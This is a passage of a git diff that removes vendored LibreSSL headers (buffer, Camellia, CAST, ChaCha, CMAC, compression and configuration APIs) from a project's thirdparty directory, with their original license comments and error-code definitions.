-#define BN_R_DIV_BY_ZERO				 103
-#define BN_R_ENCODING_ERROR				 104
-#define BN_R_EXPAND_ON_STATIC_BIGNUM_DATA		 105
-#define BN_R_INPUT_NOT_REDUCED				 110
-#define BN_R_INVALID_LENGTH				 106
-#define BN_R_INVALID_RANGE				 115
-#define BN_R_NOT_A_SQUARE				 111
-#define BN_R_NOT_INITIALIZED				 107
-#define BN_R_NO_INVERSE					 108
-#define BN_R_NO_SOLUTION				 116
-#define BN_R_P_IS_NOT_PRIME				 112
-#define BN_R_TOO_MANY_ITERATIONS			 113
-#define BN_R_TOO_MANY_TEMPORARY_VARIABLES		 109
-
-#ifdef  __cplusplus
-}
-#endif
-#endif
diff --git a/thirdparty/libressl/include/openssl/buffer.h b/thirdparty/libressl/include/openssl/buffer.h
deleted file mode 100644
index ed6dac0..0000000
--- a/thirdparty/libressl/include/openssl/buffer.h
+++ /dev/null
@@ -1,122 +0,0 @@
-/* $OpenBSD: buffer.h,v 1.15 2015/06/24 10:05:14 jsing Exp $ */
-/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
- * All rights reserved.
- *
- * This package is an SSL implementation written
- * by Eric Young (eay@cryptsoft.com).
- * The implementation was written so as to conform with Netscapes SSL.
- *
- * This library is free for commercial and non-commercial use as long as
- * the following conditions are aheared to.  The following conditions
- * apply to all code found in this distribution, be it the RC4, RSA,
- * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
- * included with this distribution is covered by the same copyright terms
- * except that the holder is Tim Hudson (tjh@cryptsoft.com).
- *
- * Copyright remains Eric Young's, and as such any Copyright notices in
- * the code are not to be removed.
- * If this package is used in a product, Eric Young should be given attribution
- * as the author of the parts of the library used.
- * This can be in the form of a textual message at program startup or
- * in documentation (online or textual) provided with the package.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 1. Redistributions of source code must retain the copyright
- *    notice, this list of conditions and the following disclaimer.
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in the
- *    documentation and/or other materials provided with the distribution.
- * 3. All advertising materials mentioning features or use of this software
- *    must display the following acknowledgement:
- *    "This product includes cryptographic software written by
- *     Eric Young (eay@cryptsoft.com)"
- *    The word 'cryptographic' can be left out if the rouines from the library
- *    being used are not cryptographic related :-).
- * 4. If you include any Windows specific code (or a derivative thereof) from
- *    the apps directory (application code) you must include an acknowledgement:
- *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
- *
- * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
- * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
- * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
- * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
- * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
- * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
- * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- * SUCH DAMAGE.
- *
- * The licence and distribution terms for any publically available version or
- * derivative of this code cannot be changed.  i.e. this code cannot simply be
- * copied and put under another distribution licence
- * [including the GNU Public Licence.]
- */
-
-#ifndef HEADER_BUFFER_H
-#define HEADER_BUFFER_H
-#if !defined(HAVE_ATTRIBUTE__BOUNDED__) && !defined(__OpenBSD__)
-#define __bounded__(x, y, z)
-#endif
-
-#include <openssl/ossl_typ.h>
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-#include <stddef.h>
-#include <sys/types.h>
-
-/* Already declared in ossl_typ.h */
-/* typedef struct buf_mem_st BUF_MEM; */
-
-struct buf_mem_st {
-	size_t length;	/* current number of bytes */
-	char *data;
-	size_t max;	/* size of buffer */
-};
-
-BUF_MEM *BUF_MEM_new(void);
-void	BUF_MEM_free(BUF_MEM *a);
-int	BUF_MEM_grow(BUF_MEM *str, size_t len);
-int	BUF_MEM_grow_clean(BUF_MEM *str, size_t len);
-
-#ifndef LIBRESSL_INTERNAL
-char *	BUF_strdup(const char *str);
-char *	BUF_strndup(const char *str, size_t siz);
-void *	BUF_memdup(const void *data, size_t siz);
-void	BUF_reverse(unsigned char *out, const unsigned char *in, size_t siz);
-
-/* safe string functions */
-size_t BUF_strlcpy(char *dst, const char *src, size_t siz)
-	__attribute__ ((__bounded__(__string__,1,3)));
-size_t BUF_strlcat(char *dst, const char *src, size_t siz)
-	__attribute__ ((__bounded__(__string__,1,3)));
-#endif
-
-/* BEGIN ERROR CODES */
-/* The following lines are auto generated by the script mkerr.pl. Any changes
- * made after this point may be overwritten when the script is next run.
- */
-void ERR_load_BUF_strings(void);
-
-/* Error codes for the BUF functions. */
-
-/* Function codes. */
-#define BUF_F_BUF_MEMDUP				 103
-#define BUF_F_BUF_MEM_GROW				 100
-#define BUF_F_BUF_MEM_GROW_CLEAN			 105
-#define BUF_F_BUF_MEM_NEW				 101
-#define BUF_F_BUF_STRDUP				 102
-#define BUF_F_BUF_STRNDUP				 104
-
-/* Reason codes. */
-
-#ifdef  __cplusplus
-}
-#endif
-#endif
diff --git a/thirdparty/libressl/include/openssl/camellia.h b/thirdparty/libressl/include/openssl/camellia.h
deleted file mode 100644
index b9b5f79..0000000
--- a/thirdparty/libressl/include/openssl/camellia.h
+++ /dev/null
@@ -1,125 +0,0 @@
-/* $OpenBSD: camellia.h,v 1.5 2014/11/13 20:01:58 miod Exp $ */
-/* ====================================================================
- * Copyright (c) 2006 The OpenSSL Project.  All rights reserved.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- *
- * 1. Redistributions of source code must retain the above copyright
- *    notice, this list of conditions and the following disclaimer. 
- *
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in
- *    the documentation and/or other materials provided with the
- *    distribution.
- *
- * 3. All advertising materials mentioning features or use of this
- *    software must display the following acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
- *
- * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
- *    endorse or promote products derived from this software without
- *    prior written permission. For written permission, please contact
- *    openssl-core@openssl.org.
- *
- * 5. Products derived from this software may not be called "OpenSSL"
- *    nor may "OpenSSL" appear in their names without prior written
- *    permission of the OpenSSL Project.
- *
- * 6. Redistributions of any form whatsoever must retain the following
- *    acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
- *
- * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
- * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
- * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
- * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
- * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
- * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
- * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
- * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
- * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
- * OF THE POSSIBILITY OF SUCH DAMAGE.
- * ====================================================================
- *
- */
-
-#ifndef HEADER_CAMELLIA_H
-#define HEADER_CAMELLIA_H
-
-#include <openssl/opensslconf.h>
-
-#ifdef OPENSSL_NO_CAMELLIA
-#error CAMELLIA is disabled.
-#endif
-
-#include <stddef.h>
-
-#define CAMELLIA_ENCRYPT	1
-#define CAMELLIA_DECRYPT	0
-
-/* Because array size can't be a const in C, the following two are macros.
-   Both sizes are in bytes. */
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-/* This should be a hidden type, but EVP requires that the size be known */
-
-#define CAMELLIA_BLOCK_SIZE 16
-#define CAMELLIA_TABLE_BYTE_LEN 272
-#define CAMELLIA_TABLE_WORD_LEN (CAMELLIA_TABLE_BYTE_LEN / 4)
-
-typedef unsigned int KEY_TABLE_TYPE[CAMELLIA_TABLE_WORD_LEN]; /* to match with WORD */
-
-struct camellia_key_st {
-	union {
-		double d;	/* ensures 64-bit align */
-		KEY_TABLE_TYPE rd_key;
-	} u;
-	int grand_rounds;
-};
-typedef struct camellia_key_st CAMELLIA_KEY;
-
-int Camellia_set_key(const unsigned char *userKey, const int bits,
-	CAMELLIA_KEY *key);
-
-void Camellia_encrypt(const unsigned char *in, unsigned char *out,
-	const CAMELLIA_KEY *key);
-void Camellia_decrypt(const unsigned char *in, unsigned char *out,
-	const CAMELLIA_KEY *key);
-
-void Camellia_ecb_encrypt(const unsigned char *in, unsigned char *out,
-	const CAMELLIA_KEY *key, const int enc);
-void Camellia_cbc_encrypt(const unsigned char *in, unsigned char *out,
-	size_t length, const CAMELLIA_KEY *key,
-	unsigned char *ivec, const int enc);
-void Camellia_cfb128_encrypt(const unsigned char *in, unsigned char *out,
-	size_t length, const CAMELLIA_KEY *key,
-	unsigned char *ivec, int *num, const int enc);
-void Camellia_cfb1_encrypt(const unsigned char *in, unsigned char *out,
-	size_t length, const CAMELLIA_KEY *key,
-	unsigned char *ivec, int *num, const int enc);
-void Camellia_cfb8_encrypt(const unsigned char *in, unsigned char *out,
-	size_t length, const CAMELLIA_KEY *key,
-	unsigned char *ivec, int *num, const int enc);
-void Camellia_ofb128_encrypt(const unsigned char *in, unsigned char *out,
-	size_t length, const CAMELLIA_KEY *key,
-	unsigned char *ivec, int *num);
-void Camellia_ctr128_encrypt(const unsigned char *in, unsigned char *out,
-	size_t length, const CAMELLIA_KEY *key,
-	unsigned char ivec[CAMELLIA_BLOCK_SIZE],
-	unsigned char ecount_buf[CAMELLIA_BLOCK_SIZE],
-	unsigned int *num);
-
-#ifdef  __cplusplus
-}
-#endif
-
-#endif /* !HEADER_Camellia_H */
diff --git a/thirdparty/libressl/include/openssl/cast.h b/thirdparty/libressl/include/openssl/cast.h
deleted file mode 100644
index 1043c7f..0000000
--- a/thirdparty/libressl/include/openssl/cast.h
+++ /dev/null
@@ -1,104 +0,0 @@
-/* $OpenBSD: cast.h,v 1.12 2014/07/10 22:45:56 jsing Exp $ */
-/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
- * All rights reserved.
- *
- * This package is an SSL implementation written
- * by Eric Young (eay@cryptsoft.com).
- * The implementation was written so as to conform with Netscapes SSL.
- * 
- * This library is free for commercial and non-commercial use as long as
- * the following conditions are aheared to.  The following conditions
- * apply to all code found in this distribution, be it the RC4, RSA,
- * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
- * included with this distribution is covered by the same copyright terms
- * except that the holder is Tim Hudson (tjh@cryptsoft.com).
- * 
- * Copyright remains Eric Young's, and as such any Copyright notices in
- * the code are not to be removed.
- * If this package is used in a product, Eric Young should be given attribution
- * as the author of the parts of the library used.
- * This can be in the form of a textual message at program startup or
- * in documentation (online or textual) provided with the package.
- * 
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 1. Redistributions of source code must retain the copyright
- *    notice, this list of conditions and the following disclaimer.
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in the
- *    documentation and/or other materials provided with the distribution.
- * 3. All advertising materials mentioning features or use of this software
- *    must display the following acknowledgement:
- *    "This product includes cryptographic software written by
- *     Eric Young (eay@cryptsoft.com)"
- *    The word 'cryptographic' can be left out if the rouines from the library
- *    being used are not cryptographic related :-).
- * 4. If you include any Windows specific code (or a derivative thereof) from 
- *    the apps directory (application code) you must include an acknowledgement:
- *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
- * 
- * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
- * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
- * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
- * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
- * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
- * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
- * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- * SUCH DAMAGE.
- * 
- * The licence and distribution terms for any publically available version or
- * derivative of this code cannot be changed.  i.e. this code cannot simply be
- * copied and put under another distribution licence
- * [including the GNU Public Licence.]
- */
-
-#ifndef HEADER_CAST_H
-#define HEADER_CAST_H
-
-#include <openssl/opensslconf.h>
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-#ifdef OPENSSL_NO_CAST
-#error CAST is disabled.
-#endif
-
-#define CAST_ENCRYPT	1
-#define CAST_DECRYPT	0
-
-#define CAST_LONG unsigned int
-
-#define CAST_BLOCK	8
-#define CAST_KEY_LENGTH	16
-
-typedef struct cast_key_st
-	{
-	CAST_LONG data[32];
-	int short_key;	/* Use reduced rounds for short key */
-	} CAST_KEY;
-
-void CAST_set_key(CAST_KEY *key, int len, const unsigned char *data);
-void CAST_ecb_encrypt(const unsigned char *in, unsigned char *out, const CAST_KEY *key,
-		      int enc);
-void CAST_encrypt(CAST_LONG *data, const CAST_KEY *key);
-void CAST_decrypt(CAST_LONG *data, const CAST_KEY *key);
-void CAST_cbc_encrypt(const unsigned char *in, unsigned char *out, long length,
-		      const CAST_KEY *ks, unsigned char *iv, int enc);
-void CAST_cfb64_encrypt(const unsigned char *in, unsigned char *out,
-			long length, const CAST_KEY *schedule, unsigned char *ivec,
-			int *num, int enc);
-void CAST_ofb64_encrypt(const unsigned char *in, unsigned char *out, 
-			long length, const CAST_KEY *schedule, unsigned char *ivec,
-			int *num);
-
-#ifdef  __cplusplus
-}
-#endif
-
-#endif
diff --git a/thirdparty/libressl/include/openssl/chacha.h b/thirdparty/libressl/include/openssl/chacha.h
deleted file mode 100644
index 8d94e62..0000000
--- a/thirdparty/libressl/include/openssl/chacha.h
+++ /dev/null
@@ -1,54 +0,0 @@
-/* $OpenBSD: chacha.h,v 1.7 2015/12/09 14:07:55 bcook Exp $ */
-/*
- * Copyright (c) 2014 Joel Sing <jsing@openbsd.org>
- *
- * Permission to use, copy, modify, and distribute this software for any
- * purpose with or without fee is hereby granted, provided that the above
- * copyright notice and this permission notice appear in all copies.
- *
- * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
- * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
- * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
- * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
- * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
- * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
- * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
- */
-
-#ifndef HEADER_CHACHA_H
-#define HEADER_CHACHA_H
-
-#include <openssl/opensslconf.h>
-
-#if defined(OPENSSL_NO_CHACHA)
-#error ChaCha is disabled.
-#endif
-
-#include <stddef.h>
-#include <stdint.h>
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-typedef struct {
-	unsigned int input[16];
-	unsigned char ks[64];
-	unsigned char unused;
-} ChaCha_ctx;
-
-void ChaCha_set_key(ChaCha_ctx *ctx, const unsigned char *key,
-    unsigned int keybits);
-void ChaCha_set_iv(ChaCha_ctx *ctx, const unsigned char *iv,
-    const unsigned char *counter);
-void ChaCha(ChaCha_ctx *ctx, unsigned char *out, const unsigned char *in,
-    size_t len);
-
-void CRYPTO_chacha_20(unsigned char *out, const unsigned char *in, size_t len,
-    const unsigned char key[32], const unsigned char iv[8], uint64_t counter);
-
-#ifdef  __cplusplus
-}
-#endif
-
-#endif /* HEADER_CHACHA_H */
diff --git a/thirdparty/libressl/include/openssl/cmac.h b/thirdparty/libressl/include/openssl/cmac.h
deleted file mode 100644
index cb6d64b..0000000
--- a/thirdparty/libressl/include/openssl/cmac.h
+++ /dev/null
@@ -1,82 +0,0 @@
-/* $OpenBSD: cmac.h,v 1.3 2014/06/21 13:42:14 jsing Exp $ */
-/* Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL
- * project.
- */
-/* ====================================================================
- * Copyright (c) 2010 The OpenSSL Project.  All rights reserved.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- *
- * 1. Redistributions of source code must retain the above copyright
- *    notice, this list of conditions and the following disclaimer.
- *
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in
- *    the documentation and/or other materials provided with the
- *    distribution.
- *
- * 3. All advertising materials mentioning features or use of this
- *    software must display the following acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
- *
- * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
- *    endorse or promote products derived from this software without
- *    prior written permission. For written permission, please contact
- *    licensing@OpenSSL.org.
- *
- * 5. Products derived from this software may not be called "OpenSSL"
- *    nor may "OpenSSL" appear in their names without prior written
- *    permission of the OpenSSL Project.
- *
- * 6. Redistributions of any form whatsoever must retain the following
- *    acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
- *
- * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
- * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
- * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
- * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
- * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
- * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
- * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
- * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
- * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
- * OF THE POSSIBILITY OF SUCH DAMAGE.
- * ====================================================================
- */
-
-
-#ifndef HEADER_CMAC_H
-#define HEADER_CMAC_H
-
-#ifdef __cplusplus
-extern "C" {
-#endif
-
-#include <openssl/evp.h>
-
-/* Opaque */
-typedef struct CMAC_CTX_st CMAC_CTX;
-
-CMAC_CTX *CMAC_CTX_new(void);
-void CMAC_CTX_cleanup(CMAC_CTX *ctx);
-void CMAC_CTX_free(CMAC_CTX *ctx);
-EVP_CIPHER_CTX *CMAC_CTX_get0_cipher_ctx(CMAC_CTX *ctx);
-int CMAC_CTX_copy(CMAC_CTX *out, const CMAC_CTX *in);
-
-int CMAC_Init(CMAC_CTX *ctx, const void *key, size_t keylen,
-    const EVP_CIPHER *cipher, ENGINE *impl);
-int CMAC_Update(CMAC_CTX *ctx, const void *data, size_t dlen);
-int CMAC_Final(CMAC_CTX *ctx, unsigned char *out, size_t *poutlen);
-int CMAC_resume(CMAC_CTX *ctx);
-
-#ifdef  __cplusplus
-}
-#endif
-#endif
diff --git a/thirdparty/libressl/include/openssl/comp.h b/thirdparty/libressl/include/openssl/comp.h
deleted file mode 100644
index fe7397f..0000000
--- a/thirdparty/libressl/include/openssl/comp.h
+++ /dev/null
@@ -1,73 +0,0 @@
-/* $OpenBSD: comp.h,v 1.8 2014/11/03 16:58:28 tedu Exp $ */
-
-#ifndef HEADER_COMP_H
-#define HEADER_COMP_H
-
-#include <openssl/crypto.h>
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-typedef struct comp_ctx_st COMP_CTX;
-
-typedef struct comp_method_st {
-	int type;		/* NID for compression library */
-	const char *name;	/* A text string to identify the library */
-	int (*init)(COMP_CTX *ctx);
-	void (*finish)(COMP_CTX *ctx);
-	int (*compress)(COMP_CTX *ctx, unsigned char *out, unsigned int olen,
-	    unsigned char *in, unsigned int ilen);
-	int (*expand)(COMP_CTX *ctx, unsigned char *out, unsigned int olen,
-	    unsigned char *in, unsigned int ilen);
-	/* The following two do NOTHING, but are kept for backward compatibility */
-	long (*ctrl)(void);
-	long (*callback_ctrl)(void);
-} COMP_METHOD;
-
-struct comp_ctx_st {
-	COMP_METHOD *meth;
-	unsigned long compress_in;
-	unsigned long compress_out;
-	unsigned long expand_in;
-	unsigned long expand_out;
-
-	CRYPTO_EX_DATA	ex_data;
-};
-
-
-COMP_CTX *COMP_CTX_new(COMP_METHOD *meth);
-void COMP_CTX_free(COMP_CTX *ctx);
-int COMP_compress_block(COMP_CTX *ctx, unsigned char *out, int olen,
-    unsigned char *in, int ilen);
-int COMP_expand_block(COMP_CTX *ctx, unsigned char *out, int olen,
-    unsigned char *in, int ilen);
-COMP_METHOD *COMP_rle(void );
-COMP_METHOD *COMP_zlib(void );
-void COMP_zlib_cleanup(void);
-
-#ifdef HEADER_BIO_H
-#ifdef ZLIB
-BIO_METHOD *BIO_f_zlib(void);
-#endif
-#endif
-
-void ERR_load_COMP_strings(void);
-
-/* Error codes for the COMP functions. */
-
-/* Function codes. */
-#define COMP_F_BIO_ZLIB_FLUSH				 99
-#define COMP_F_BIO_ZLIB_NEW				 100
-#define COMP_F_BIO_ZLIB_READ				 101
-#define COMP_F_BIO_ZLIB_WRITE				 102
-
-/* Reason codes. */
-#define COMP_R_ZLIB_DEFLATE_ERROR			 99
-#define COMP_R_ZLIB_INFLATE_ERROR			 100
-#define COMP_R_ZLIB_NOT_SUPPORTED			 101
-
-#ifdef  __cplusplus
-}
-#endif
-#endif
diff --git a/thirdparty/libressl/include/openssl/conf.h b/thirdparty/libressl/include/openssl/conf.h
deleted file mode 100644
index 095066d..0000000
--- a/thirdparty/libressl/include/openssl/conf.h
+++ /dev/null
@@ -1,249 +0,0 @@
-/* $OpenBSD: conf.h,v 1.14 2015/02/07 13:19:15 doug Exp $ */
-/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
- * All rights reserved.
- *
- * This package is an SSL implementation written
- * by Eric Young (eay@cryptsoft.com).
- * The implementation was written so as to conform with Netscapes SSL.
- *
- * This library is free for commercial and non-commercial use as long as
- * the following conditions are aheared to.  The following conditions
- * apply to all code found in this distribution, be it the RC4, RSA,
- * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
- * included with this distribution is covered by the same copyright terms
- * except that the holder is Tim Hudson (tjh@cryptsoft.com).
- *
- * Copyright remains Eric Young's, and as such any Copyright notices in
- * the code are not to be removed.
- * If this package is used in a product, Eric Young should be given attribution
- * as the author of the parts of the library used.
- * This can be in the form of a textual message at program startup or
- * in documentation (online or textual) provided with the package.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 1. Redistributions of source code must retain the copyright
- *    notice, this list of conditions and the following disclaimer.
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in the
- *    documentation and/or other materials provided with the distribution.
- * 3. All advertising materials mentioning features or use of this software
- *    must display the following acknowledgement:
- *    "This product includes cryptographic software written by
- *     Eric Young (eay@cryptsoft.com)"
- *    The word 'cryptographic' can be left out if the rouines from the library
- *    being used are not cryptographic related :-).
- * 4. If you include any Windows specific code (or a derivative thereof) from
- *    the apps directory (application code) you must include an acknowledgement:
- *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
- *
- * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
- * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
- * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
- * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
- * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
- * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
- * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- * SUCH DAMAGE.
- *
- * The licence and distribution terms for any publically available version or
- * derivative of this code cannot be changed.  i.e. this code cannot simply be
- * copied and put under another distribution licence
- * [including the GNU Public Licence.]
- */
-
-#ifndef  HEADER_CONF_H
-#define HEADER_CONF_H
-
-#include <openssl/opensslconf.h>
-
-#include <openssl/bio.h>
-#include <openssl/lhash.h>
-#include <openssl/stack.h>
-#include <openssl/safestack.h>
-
-#include <openssl/ossl_typ.h>
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-typedef struct {
-	char *section;
-	char *name;
-	char *value;
-} CONF_VALUE;
-
-DECLARE_STACK_OF(CONF_VALUE)
-DECLARE_LHASH_OF(CONF_VALUE);
-
-struct conf_st;
-struct conf_method_st;
-typedef struct conf_method_st CONF_METHOD;
-
-struct conf_method_st {
-	const char *name;
-	CONF *(*create)(CONF_METHOD *meth);
-	int (*init)(CONF *conf);
-	int (*destroy)(CONF *conf);
-	int (*destroy_data)(CONF *conf);
-	int (*load_bio)(CONF *conf, BIO *bp, long *eline);
-	int (*dump)(const CONF *conf, BIO *bp);
-	int (*is_number)(const CONF *conf, char c);
-	int (*to_int)(const CONF *conf, char c);
-	int (*load)(CONF *conf, const char *name, long *eline);
-};
-
-/* Module definitions */
-
-typedef struct conf_imodule_st CONF_IMODULE;
-typedef struct conf_module_st CONF_MODULE;
-
-DECLARE_STACK_OF(CONF_MODULE)
-DECLARE_STACK_OF(CONF_IMODULE)
-
-/* DSO module function typedefs */
-typedef int conf_init_func(CONF_IMODULE *md, const CONF *cnf);
-typedef void conf_finish_func(CONF_IMODULE *md);
-
-#define	CONF_MFLAGS_IGNORE_ERRORS	0x1
-#define CONF_MFLAGS_IGNORE_RETURN_CODES	0x2
-#define CONF_MFLAGS_SILENT		0x4
-#define CONF_MFLAGS_NO_DSO		0x8
-#define CONF_MFLAGS_IGNORE_MISSING_FILE	0x10
-#define CONF_MFLAGS_DEFAULT_SECTION	0x20
-
-int CONF_set_default_method(CONF_METHOD *meth);
-void CONF_set_nconf(CONF *conf, LHASH_OF(CONF_VALUE) *hash);
-LHASH_OF(CONF_VALUE) *CONF_load(LHASH_OF(CONF_VALUE) *conf, const char *file,
-    long *eline);
-LHASH_OF(CONF_VALUE) *CONF_load_fp(LHASH_OF(CONF_VALUE) *conf, FILE *fp,
-    long *eline);
-LHASH_OF(CONF_VALUE) *CONF_load_bio(LHASH_OF(CONF_VALUE) *conf, BIO *bp, long *eline);
-STACK_OF(CONF_VALUE) *CONF_get_section(LHASH_OF(CONF_VALUE) *conf,
-    const char *section);
-char *CONF_get_string(LHASH_OF(CONF_VALUE) *conf, const char *group,
-    const char *name);
-long CONF_get_number(LHASH_OF(CONF_VALUE) *conf, const char *group,
-    const char *name);
-void CONF_free(LHASH_OF(CONF_VALUE) *conf);
-int CONF_dump_fp(LHASH_OF(CONF_VALUE) *conf, FILE *out);
-int CONF_dump_bio(LHASH_OF(CONF_VALUE) *conf, BIO *out);
-
-void OPENSSL_config(const char *config_name);
-void OPENSSL_no_config(void);
-
-/* New conf code.  The semantics are different from the functions above.
-   If that wasn't the case, the above functions would have been replaced */
-
-struct conf_st {
-	CONF_METHOD *meth;
-	void *meth_data;
-	LHASH_OF(CONF_VALUE) *data;
-};
-
-CONF *NCONF_new(CONF_METHOD *meth);
-CONF_METHOD *NCONF_default(void);
-CONF_METHOD *NCONF_WIN32(void);
-void NCONF_free(CONF *conf);
-void NCONF_free_data(CONF *conf);
-
